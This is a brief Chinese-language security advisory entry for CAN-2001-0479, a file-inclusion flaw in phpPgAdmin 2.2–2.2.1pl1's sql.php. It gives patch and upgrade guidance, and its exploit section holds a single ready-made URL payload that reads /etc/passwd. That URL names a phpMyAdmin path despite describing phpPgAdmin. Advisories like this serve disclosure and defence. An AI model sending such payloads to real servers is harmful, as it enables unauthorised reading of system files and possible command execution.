添加时间:
2005-08-11

系统编号:
WAVDB-00036
BugCVE: CAN-2001-0479
BUGTRAQ: 2640

影响版本:
phpPgAdmin 2.2-2.2.1pl1

程序介绍:

phpPgAdmin是一个免费的基于PHP开发的软件包，它为PostgreSQL数据库管理提供了一个图形界面。

漏洞分析:

由于sql.php没有充分对用户的输入进行验证，导致攻击者可能在该脚本中嵌入任意文件，这可能会导致系统敏感信息的泄露或者是任意命令的执行。

漏洞利用:

http:///phpMyAdmin/sql.php?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd

解决方案:
临时解决方法：
Secure Reality Pty提供了一个临时的补丁来解决此问题:
phpPgAdmin 2.2.1:
http://www.securereality.com.au/ ... -SecureReality.diff

厂商补丁
建议您立刻升级到phpPgAdmin 2.3或更新版本：
http://www.greatbridge.org/project/phppgadmin/projdisplay.php

信息来源:
<*来源：Secure Reality Pty Ltd.：SRPRE00001
http://www.securereality.com.au *>